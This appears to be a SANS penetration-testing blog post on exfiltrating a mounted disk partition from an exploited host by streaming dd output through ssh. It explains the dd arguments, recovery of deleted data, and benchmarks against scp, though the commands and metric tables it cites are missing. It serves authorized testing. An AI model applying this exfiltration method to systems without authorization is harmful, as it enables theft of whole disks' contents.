SANS Penetration Testing

Introduction

Sometimes, when looking through files for useful information after exploiting a box, you might run into a small file system or particularly interesting disk partition. Due to time constraints and the need for specialized analysis tools it might be helpful or even necessary to exfiltrate the entire partition. In these cases, we can combine the powers of dd as a data duplication tool and ssh as a means of securely and reliably transferring data to efficiently bring the remote partition to our local attack machine.

This provides a file-by-file copy mechanism that will bring copies of all files in the /data directory back to the pentester's system. Measuring performance in terms of time, bandwidth used, and data pulled across multiple executions provided the following metrics:

Doing a quick comparison we can see that the compression of scp on our test dataset ( ~685MB random data split into 653 files) was completely ineffective. In fact, the compression actually bloated the amount of data transmitted on the wire; data sent was approximately 105% the size of the data on disk.

Maybe dd + ssh will provide a superior alternative?

By using the dd command we can perform a byte-by-byte copy of the underlying partition that is mounted to the /data directory. Copying data this way will bring back the entire partition, slack space included, so that disk forensics tools can even be used to recover data that has been deleted from the victim machine.

In the above dd command we use the In File switch (if=) to specify the input file for duplication (in this case /dev/sdb1, the underlying partition which is mounted on /data). The byte size (bs=) argument is used to specify the byte size; the number of bytes to be read concurrently. Because the output of this dd command is being directed (via | operator) into the ssh command to stream data to the attack station we specified 65536 bytes, this is generally the maximum capacity of the pipe buffer (PIPE_BUF) on Unix systems though this can vary wildly. The convert (conv=) arguments of noerror and sync are commonly used when making backup images. They allow dd to continue image creation when read errors occur and to replace missing data in the created image with null bytes to preserve as much of the original image as possible. For performance statistics the above command was run multiple times and yielded the following metrics:

So with dd + ssh running on the same dataset of completely random data, compression functioned as intended and data transmitted was approximately 67% the size of the data on disk. Additionally, the execution time was only .083 seconds slower despite the 56.6% larger byte-by-byte disk image that was transferred.

Conclusion

In additional testing the dd + ssh option continued to performed. Even against standalone files dd + ssh performance was nearly identical to or outperformed the scp alternative. While this won't hold true in every scenario, and while there are definitely some cases where scp would be the better option, dd + ssh provides a robust solution to enable controlled, compressed, and encrypted mass data transfer.